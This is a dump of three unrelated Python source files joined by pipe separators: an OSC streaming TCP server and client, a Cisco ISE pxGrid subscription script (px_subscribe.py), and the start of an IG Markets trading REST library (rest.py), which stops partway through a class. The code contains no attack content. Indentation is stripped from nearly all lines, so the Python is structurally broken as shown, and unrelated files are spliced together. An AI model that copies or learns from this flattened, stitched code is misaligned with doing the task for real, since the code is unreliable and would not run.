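def _example_unframe_packet(stream_bytes):
    """Splits one length-prefixed packet off the front of a byte string.
    Returns (packet, remainder)."""
    (length,) = struct.unpack(">L", stream_bytes[:4])
    return stream_bytes[4:4 + length], stream_bytes[4 + length:]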
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates an OSCStreamRequestHandler
for each new connection. This is fundamentally different from a packet
oriented server, which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
per connection, because TCP servers usually spawn a new thread or process
for each new connection; having every thread operate on the same address
space object would create severe multithreading synchronization problems.
Therefore, to implement a streaming/TCP OSC server, a custom handler must be
written that overrides the setupAddressSpace member and creates its own
address space for that particular connection. This has been done within the
testbench and can serve as inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print("SERVER: New client connection.")
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print("SERVER: Client connection handled.")
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
# (array typecode 'c' and tostring() are gone in Python 3, so pack directly)
len_big_endian = struct.pack(">L", length)
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error as e:
if e.errno == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print("SERVER: Entered server loop")
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print("OSC stream server: Spurious message received.")
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error as e:
if e.errno == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fulfilled
print("SERVER: Connection has been reset by peer.")
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread-safe.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future).
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- address ((host, port) tuple): the local host & TCP-port
the server listens on for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is the same for
all connections.
"""
pass
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing synchronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = bytes()  # socket.recv() returns bytes in Python 3
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return None
else:
continue
except socket.error as e:
if e.errno == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return None
else:
raise e
if not tmp or len(tmp) == 0:
print("CLIENT: Socket has been closed.")
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print("CLIENT: Entered receiving thread.")
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print("CLIENT: Receiving thread terminated.")
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return False
else:
continue
except socket.error as e:
if e.errno == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
# (array typecode 'c' and tostring() are gone in Python 3, so pack directly)
len_big_endian = struct.pack(">L", length)
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
# 'cmp' and '_sock' are gone in Python 3; compare the socket objects directly
isequal = self.socket == other.socket
if isequal and getattr(self, 'server', None) and getattr(other, 'server', None):
return self.server == other.server
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
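# Illustrative sketch (host/port are placeholders, matching the example server
# above): connect an OSCStreamingClient, register a handler for replies that
# arrive on the receiving thread, and send one message.
def _example_streaming_client():
    client = OSCStreamingClient()
    def pong_handler(addr, tags, data, client_address):
        print("reply:", addr, data)
    client.addMsgHandler("/pong", pong_handler)
    client.connect(("127.0.0.1", 9010))
    msg = OSCMessage("/ping")
    msg.append("hello")
    client.sendOSC(msg)
    time.sleep(1.0)    # give the receiving thread a chance to process a reply
    client.close()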
# vim:noexpandtab
|
px_subscribe.py
|
import asyncio
from .pxgrid import PxgridControl
from .config import Config
from sync.models import ISEServer
import json
import sys
import time
import logging
import threading
import hashlib
from websockets import ConnectionClosed, ConnectionClosedOK
from .ws_stomp import WebSocketStomp
from signal import SIGINT, SIGTERM
from .pxgrid_update import process_sgt_update, process_sgacl_update, process_emc_update, get_sync_account
import traceback
# from contextlib import suppress
from asgiref.sync import async_to_sync
# import concurrent.futures
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
#
# the global logger
#
logger = logging.getLogger(__name__)
#
# lock for deduplicating session events received
#
dedup_lock = threading.Lock()
#
# dictionary for storing event keys in
#
# TODO: this really needs a cleaner to remove old events
#
event_keys = {}
#
# definitions of service names possible when this script was written
# or updated
#
SERVICE_NAMES = [
"com.cisco.ise.mdm",
"com.cisco.ise.trustsec",
"com.cisco.ise.config.trustsec",
"com.cisco.ise.session",
"com.cisco.ise.config.anc",
"com.cisco.endpoint.asset",
"com.cisco.ise.radius",
"com.cisco.ise.system",
"com.cisco.ise.sxp",
"com.cisco.ise.config.profiler",
"com.cisco.ise.pubsub",
]
loop = None
def __init__(self, external_loop):
super(StoppableThread, self).__init__()
self._stop_event = threading.Event()
self.loop = external_loop
self.ws = None
def stop(self):
self._stop_event.set()
# for task in asyncio.Task.all_tasks():
# task.cancel()
# asyncio.ensure_future(self.ws.stomp_disconnect('123'))
# asyncio.ensure_future(asyncio.sleep(2.0))
# asyncio.ensure_future(self.ws.disconnect())
asyncio.run_coroutine_threadsafe(self.ws.stomp_disconnect('123'), self.loop)
# asyncio.run_coroutine_threadsafe(asyncio.sleep(2.0), self.loop)
asyncio.run_coroutine_threadsafe(self.ws.disconnect(), self.loop)
# self.loop.stop()
# self.loop.close()
def stopped(self):
return self._stop_event.is_set()
async def future_read_message(self, ws, future):
try:
message = await ws.stomp_read_message()
future.set_result(message)
except ConnectionClosed:
self.logger.debug('Websocket connection closed')
@async_to_sync
async def default_subscription_loop(self, config, secret, ws_url, topic, pubsub_node_name):
'''
Simple subscription loop just to display whatever events arrive.
'''
self.logger.debug('starting subscription to %s at %s', topic, ws_url)
ws = WebSocketStomp(ws_url, config.node_name, secret, config.ssl_context)
self.ws = ws
await ws.connect()
await ws.stomp_connect(pubsub_node_name)
for topic_item in topic:
await ws.stomp_subscribe(topic_item)
try:
while True:
if self.stopped():
break
message = json.loads(await ws.stomp_read_message())
print(json.dumps(message, indent=2, sort_keys=True), file=sys.stdout)
sys.stdout.flush()
if "securityGroup" in message:
await process_sgt_update(message, await get_sync_account(config.config_id))
await process_emc_update(message, await get_sync_account(config.config_id))
elif "acl" in message:
await process_sgacl_update(message, await get_sync_account(config.config_id))
except asyncio.CancelledError:
pass
self.logger.debug('shutting down listener...')
await ws.stomp_disconnect('123')
await asyncio.sleep(2.0)
await ws.disconnect()
@async_to_sync
async def session_dedup_loop(self, config, secret, ws_url, topic, pubsub_node_name):
'''
Subscription loop specifically for ISE pxGrid sessionTopic events. The
logic for de-duplication is based around callingStationId, timestamp and
event content. Multiple events may have the same callingStationId and
timestamp, but attribute changes, like profiling determining the operating
system for a device, may result in events that have the same timestamp but
different contents.
The algorithm in this routine takes this into account, and will "de-
duplicate" the events (i.e. tell you when a duplicate event arrived). It
uses MD5 (for speed) on a key-sorted dump of the event, so that true
duplicates hash to the same digest while content changes produce a
different one.
'''
self.logger.debug('starting subscription to %s at %s', topic, ws_url)
assert '/topic/com.cisco.ise.session' in topic, '%s is not the sessionTopic' % topic
ws = WebSocketStomp(ws_url, config.node_name, secret, config.ssl_context)
await ws.connect()
await ws.stomp_connect(pubsub_node_name)
for topic_item in topic:
await ws.stomp_subscribe(topic_item)
try:
while True:
if self.stopped():
break
message = json.loads(await ws.stomp_read_message())
with self.dedup_lock:
for s in message['sessions']:
event_text = json.dumps(s, indent=2, sort_keys=True)
event_hash = hashlib.md5(event_text.encode()).hexdigest()
event_key = '{}:{}:{}'.format(
s['callingStationId'], s['timestamp'], event_hash)
if self.event_keys.get(event_key):
self.event_keys[event_key]['count'] = self.event_keys[event_key]['count'] + 1
print('duplicate mac:timestamp:hash event, count {}'.format(
self.event_keys[event_key]['count']))
print(' --> {}'.format(ws_url))
else:
self.event_keys[event_key] = {}
self.event_keys[event_key]['count'] = 1
self.event_keys[event_key]['time'] = time.time()
self.event_keys[event_key]['event'] = event_text
self.event_keys[event_key]['md5'] = event_hash
print('{}\nevent from {}'.format('-' * 75, ws_url))
print(json.dumps(s, indent=2, sort_keys=True))
sys.stdout.flush()
except asyncio.CancelledError:
pass
self.logger.debug('shutting down listener...')
await ws.stomp_disconnect('123')
await asyncio.sleep(2.0)
await ws.disconnect()
# subscribe to topic on ALL service nodes returned
async def run_subscribe_all(self, task_list):
self.logger.debug('run_subscribe_all')
if len(task_list) > 0:
try:
return await asyncio.gather(*task_list)
except asyncio.CancelledError:
for t in task_list:
t.cancel()
return await asyncio.gather(*task_list)
# if __name__ == '__main__':
def run(self):
#
# this will parse all the CLI options, and there **must** be EITHER
# a '--services' OR '--subscribe'
#
config = Config()
#
# verbose logging if configured
#
if config.verbose:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s:%(name)s:%(levelname)s:%(message)s'))
self.logger.addHandler(handler)
self.logger.setLevel(logging.DEBUG)
# and set for stomp and ws_stomp modules also
for stomp_mod in ['stomp', 'ws_stomp', 'pxgrid']:
s_logger = logging.getLogger(stomp_mod)
handler.setFormatter(logging.Formatter('%(asctime)s:%(name)s:%(levelname)s:%(message)s'))
s_logger.addHandler(handler)
s_logger.setLevel(logging.DEBUG)
#
# if we just have a request for services and no hostname, we can only
# list out the services we know about
#
if config.services and (not config.hostname):
print("Known services:")
for service in sorted(self.SERVICE_NAMES):
print(' %s' % service)
sys.exit(0)
#
# if we at least have a hostname, we can move forward and set up the
# px grid control object and look at either deeper service discovery
# or just subscribing to what we're asked to subscribe to
#
pxgrid = PxgridControl(config=config)
#
# in case we need to go approve in the ISE UI
#
while pxgrid.account_activate()['accountState'] != 'ENABLED':
time.sleep(60)
# lookup for session service
if config.services:
slr_responses = []
for service in self.SERVICE_NAMES:
service_lookup_response = pxgrid.service_lookup(service)
slr_responses.append(service_lookup_response)
#
# log for debug
#
slr_string = json.dumps(service_lookup_response, indent=2, sort_keys=True)
self.logger.debug('service %s lookup response:', service)
for s in slr_string.splitlines():
self.logger.debug(' %s', s)
#
# dump all services as a json array pretty-printed
#
print(json.dumps(slr_responses, indent=2, sort_keys=True))
sys.exit(0)
# get the details of a specific service and then exit
if config.service_details:
# first, the basic service
service_lookup_response = pxgrid.service_lookup(config.service_details)
print(json.dumps(service_lookup_response, indent=2, sort_keys=True))
# check if any of the services have a "wsPubsubService", and, if so,
# also list out those services
if "services" in service_lookup_response:
topics = []
for s in service_lookup_response['services']:
pubsub_service = s['properties'].get('wsPubsubService')
if pubsub_service:
for p, v in s['properties'].items():
if 'topic' in p.lower():
topics.append({p: v, 'wsPubsubService': pubsub_service})
break
# lookup the pubsub service if there is one
pubsub_slr = pxgrid.service_lookup(pubsub_service)
if pubsub_slr:
print(json.dumps(pubsub_slr, indent=2, sort_keys=True))
# now exit
sys.exit(0)
# if we drop through to here, we must be subscribing, so do some initial
# checks to make sure we have enough parameters
if config.service is None or config.topic is None:
self.logger.error('must have a service and a topic!')
sys.exit(1)
#
# now subscribe
#
service_lookup_response = pxgrid.service_lookup(config.service)
slr_string = json.dumps(service_lookup_response, indent=2, sort_keys=True)
self.logger.debug('service lookup response:')
for s in slr_string.splitlines():
self.logger.debug(' %s', s)
service = service_lookup_response['services'][0]
pubsub_service_name = service['properties']['wsPubsubService']
try:
topic = []
topic_list = config.topic.split(",")
for topic_item in topic_list:
topic.append(service['properties'][topic_item])
except KeyError:
self.logger.debug('invalid topic %s', config.topic)
possible_topics = [k for k in service['properties'].keys() if
k != 'wsPubsubService' and k != 'restBaseUrl' and k != 'restBaseURL']
self.logger.debug('possible topic handles: %s', ', '.join(possible_topics))
sys.exit(1)
# lookup the pubsub service
service_lookup_response = pxgrid.service_lookup(pubsub_service_name)
# select the subscription loop
subscription_loop = self.default_subscription_loop
if config.session_dedup:
subscription_loop = self.session_dedup_loop
if not config.subscribe_all:
# just subscribe to first pubsub service node returned
pubsub_service = service_lookup_response['services'][0]
pubsub_node_name = pubsub_service['nodeName']
secret = pxgrid.get_access_secret(pubsub_node_name)['secret']
ws_url = pubsub_service['properties']['wsUrl']
if self.loop:
main_task = self.loop.run_in_executor(None, subscription_loop, config, secret, ws_url, topic, pubsub_node_name)
else:
self.loop = asyncio.get_event_loop()
main_task = asyncio.ensure_future(subscription_loop(config, secret, ws_url, topic, pubsub_node_name))
self.loop.add_signal_handler(SIGINT, main_task.cancel)
self.loop.add_signal_handler(SIGTERM, main_task.cancel)
try:
self.loop.run_until_complete(main_task)
except ConnectionClosedOK:
pass
except Exception: # pragma: no cover
print(traceback.format_exc())
else:
# create all subscription tasks
subscriber_tasks = []
if self.loop:
loop = self.loop
else:
loop = asyncio.get_event_loop()
for pubsub_service in service_lookup_response['services']:
pubsub_node_name = pubsub_service['nodeName']
secret = pxgrid.get_access_secret(pubsub_node_name)['secret']
ws_url = pubsub_service['properties']['wsUrl']
task = asyncio.ensure_future(subscription_loop(config, secret, ws_url, topic, pubsub_node_name))
subscriber_tasks.append(task)
# create the run all task and graceful termination handling
try:
self.logger.debug('Create run all task')
run_all_task = asyncio.ensure_future(self.run_subscribe_all(subscriber_tasks))
self.logger.debug('Add signal handlers to run all task')
loop.add_signal_handler(SIGINT, run_all_task.cancel)
loop.add_signal_handler(SIGTERM, run_all_task.cancel)
loop.run_until_complete(run_all_task)
except Exception:
pass
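# Illustrative sketch (not part of the original script): the pattern used above --
# wrap several coroutines into one aggregate task, cancel that task on SIGINT/SIGTERM,
# and run the loop until it completes -- can be reproduced in isolation as below.
# The `worker` coroutine is hypothetical and only for illustration.
#
#   import asyncio
#   from signal import SIGINT, SIGTERM
#
#   async def worker(name):
#       while True:
#           await asyncio.sleep(1)
#
#   loop = asyncio.get_event_loop()
#   tasks = [asyncio.ensure_future(worker(n)) for n in ("a", "b")]
#   all_task = asyncio.ensure_future(asyncio.gather(*tasks))
#   loop.add_signal_handler(SIGINT, all_task.cancel)
#   loop.add_signal_handler(SIGTERM, all_task.cancel)
#   try:
#       loop.run_until_complete(all_task)
#   except asyncio.CancelledError:
#       pass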
# def start_background_loop(loop: asyncio.AbstractEventLoop) -> None:
# asyncio.set_event_loop(loop)
# loop.run_forever()
#
#
# def job():
# # this should be used when we are sure pxgrid is running
# loop = asyncio.new_event_loop()
# th = threading.Thread(target=start_background_loop, args=(loop,))
# th.start()
# run(loop)
#
#
# def job_try(scheduler=None):
# # this should be used when we don't know if pxgrid has been configured yet
# try:
# loop = asyncio.new_event_loop()
# th = threading.Thread(target=start_background_loop, args=(loop,))
# th.start()
# ret = run(loop)
# if ret is not False and scheduler:
# pxgrid_job = scheduler.get_job("pxgrid_monitor")
# if pxgrid_job:
# pxgrid_job.remove()
# print("pxGrid Monitor started")
# else:
# print("pxGrid configuration not present. Will check again...")
# except Exception as e:
# print("#### Exception starting scheduled job: sync_pxgrid", e)
# print(traceback.format_exc())
def run():
loop = asyncio.new_event_loop()
testthread = StoppableThread(loop)
loop.add_signal_handler(SIGINT, testthread.stop)
loop.add_signal_handler(SIGTERM, testthread.stop)
testthread.start()
def task():
testthread = None
servers = ISEServer.objects.all()
while True:
if len(servers) > 0:
server = servers[0]
if testthread:
print("Restarting pxGrid for", server, "...")
testthread.stop()
time.sleep(10)
else:
print("Starting pxGrid for", server, "...")
loop = asyncio.new_event_loop()
testthread = StoppableThread(loop)
try:
loop.add_signal_handler(SIGINT, testthread.stop)
loop.add_signal_handler(SIGTERM, testthread.stop)
except Exception:
print("Unable to assign signal handler.")
testthread.start()
server.pxgrid_reset = False
server.skip_update = True
server.save()
servers = ISEServer.objects.filter(pxgrid_reset=True)
time.sleep(60)
|
rest.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
IG Markets REST API Library for Python
https://labs.ig.com/rest-trading-api-reference
Original version by Lewis Barber - 2014 - https://uk.linkedin.com/in/lewisbarber/
Modified by Femto Trader - 2014-2015 - https://github.com/femtotrader/
""" # noqa
import json
import logging
import time
from base64 import b64encode, b64decode
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
from requests import Session
from urllib.parse import urlparse, parse_qs
from datetime import timedelta, datetime
from .utils import _HAS_PANDAS, _HAS_MUNCH
from .utils import conv_resol, conv_datetime, conv_to_ms, DATE_FORMATS
if _HAS_MUNCH:
from .utils import munchify
if _HAS_PANDAS:
from .utils import pd, np
from pandas import json_normalize
from threading import Thread
from queue import Queue, Empty
logger = logging.getLogger(__name__)
class ApiExceededException(Exception):
"""Raised when our code hits the IG endpoint too often"""
pass
class IGException(Exception):
pass
class IGSessionCRUD(object):
"""Session with CRUD operation"""
BASE_URL = None
def __init__(self, base_url, api_key, session):
self.BASE_URL = base_url
self.API_KEY = api_key
self.session = session
self.session.headers.update({
"X-IG-API-KEY": self.API_KEY,
'Content-Type': 'application/json',
'Accept': 'application/json; charset=UTF-8'
})
def _get_session(self, session):
"""Returns a Requests session if session is None
or session if it's not None (cached session
with requests-cache for example)
:param session:
:return:
"""
if session is None:
session = self.session # requests Session
else:
session = session
return session
def _url(self, endpoint):
"""Returns url from endpoint and base url"""
return self.BASE_URL + endpoint
def create(self, endpoint, params, session, version):
"""Create = POST"""
url = self._url(endpoint)
session = self._get_session(session)
session.headers.update({'VERSION': version})
response = session.post(url, data=json.dumps(params))
logging.info(f"POST '{endpoint}', resp {response.status_code}")
if response.status_code in [401, 403]:
if 'exceeded-api-key-allowance' in response.text:
raise ApiExceededException()
else:
raise IGException(f"HTTP error: {response.status_code} {response.text}")
return response
def read(self, endpoint, params, session, version):
"""Read = GET"""
url = self._url(endpoint)
session = self._get_session(session)
session.headers.update({'VERSION': version})
response = session.get(url, params=params)
# handle 'read_session' with 'fetchSessionTokens=true'
handle_session_tokens(response, self.session)
logging.info(f"GET '{endpoint}', resp {response.status_code}")
return response
def update(self, endpoint, params, session, version):
"""Update = PUT"""
url = self._url(endpoint)
session = self._get_session(session)
session.headers.update({'VERSION': version})
response = session.put(url, data=json.dumps(params))
logging.info(f"PUT '{endpoint}', resp {response.status_code}")
return response
def delete(self, endpoint, params, session, version):
"""Delete = POST"""
url = self._url(endpoint)
session = self._get_session(session)
session.headers.update({'VERSION': version})
session.headers.update({'_method': 'DELETE'})
response = session.post(url, data=json.dumps(params))
logging.info(f"DELETE (POST) '{endpoint}', resp {response.status_code}")
if '_method' in session.headers:
del session.headers['_method']
return response
def req(self, action, endpoint, params, session, version):
"""Send a request (CREATE READ UPDATE or DELETE)"""
d_actions = {
"create": self.create,
"read": self.read,
"update": self.update,
"delete": self.delete,
}
return d_actions[action](endpoint, params, session, version)
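# Illustrative sketch (assumption, not part of the library's documented API): IGSessionCRUD
# maps the four CRUD verbs onto HTTP methods and stamps the per-request VERSION header,
# so callers only supply (action, endpoint, params, session, version). For example:
#
#   from requests import Session
#
#   crud = IGSessionCRUD("https://demo-api.ig.com/gateway/deal", "MY_API_KEY", Session())
#   # GET /accounts using API version 1 (the API key above is a placeholder)
#   response = crud.req("read", "/accounts", {}, None, "1")
#   print(response.status_code)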
class IGService:
D_BASE_URL = {
"live": "https://api.ig.com/gateway/deal",
"demo": "https://demo-api.ig.com/gateway/deal",
}
API_KEY = None
IG_USERNAME = None
IG_PASSWORD = None
_refresh_token = None
_valid_until = None
def __init__(
self,
username,
password,
api_key,
acc_type="demo",
acc_number=None,
session=None,
return_dataframe=_HAS_PANDAS,
return_munch=_HAS_MUNCH,
retryer=None,
use_rate_limiter=False
):
"""Constructor, calls the method required to connect to
the API (accepts acc_type = LIVE or DEMO)"""
self.API_KEY = api_key
self.IG_USERNAME = username
self.IG_PASSWORD = password
self.ACC_NUMBER = acc_number
self._retryer = retryer
self._use_rate_limiter = use_rate_limiter
self._bucket_threads_run = False
try:
self.BASE_URL = self.D_BASE_URL[acc_type.lower()]
except Exception:
raise IGException("Invalid account type '%s', please provide LIVE or DEMO" %
acc_type)
self.return_dataframe = return_dataframe
self.return_munch = return_munch
if session is None:
self.session = Session() # Requests Session (global)
else:
self.session = session
self.crud_session = IGSessionCRUD(self.BASE_URL, self.API_KEY, self.session)
def setup_rate_limiter(self, ):
data = self.get_client_apps()
for acc in data:
if acc['apiKey'] == self.API_KEY:
break
# If self.create_session() is called a second time, we should exit any currently running threads
self._exit_bucket_threads()
# Horrific magic number to reduce API published allowable requests per minute to a
# value that won't result in 403 -> error.public-api.exceeded-account-trading-allowance
# Tested for non_trading = 30 (live) and 10 (demo) requests per minute.
# This wouldn't be needed if IG's API functioned as published!
MAGIC_NUMBER = 2
self._trading_requests_per_minute = acc['allowanceAccountTrading'] - MAGIC_NUMBER
logging.info(f"Published IG Trading Request limits for trading request: "
f"{acc['allowanceAccountTrading']} per minute. Using: {self._trading_requests_per_minute}")
self._non_trading_requests_per_minute = acc['allowanceAccountOverall'] - MAGIC_NUMBER
logging.info(f"Published IG Trading Request limits for non-trading request: "
f"{acc['allowanceAccountOverall']} per minute. Using {self._non_trading_requests_per_minute}")
time.sleep(60.0 / self._non_trading_requests_per_minute)
self._bucket_threads_run = True # Thread exit variable
# Create a leaky token bucket for trading requests
trading_requests_burst = 1 # If IG ever allow bursting, increase this
self._trading_requests_queue = Queue(trading_requests_burst)
# prefill the bucket so we can burst
[self._trading_requests_queue.put(True) for i in range(trading_requests_burst)]
token_bucket_trading_thread = Thread(target=self._token_bucket_trading,)
token_bucket_trading_thread.start()
self._trading_times = []
# Create a leaky token bucket for non-trading requests
non_trading_requests_burst = 1 # If IG ever allow bursting, increase this
self._non_trading_requests_queue = Queue(non_trading_requests_burst)
# prefill the bucket so we can burst
[self._non_trading_requests_queue.put(True) for i in range(non_trading_requests_burst)]
token_bucket_non_trading_thread = Thread(target=self._token_bucket_non_trading,)
token_bucket_non_trading_thread.start()
self._non_trading_times = []
# TODO
# Create a leaky token bucket for allowanceAccountHistoricalData
return
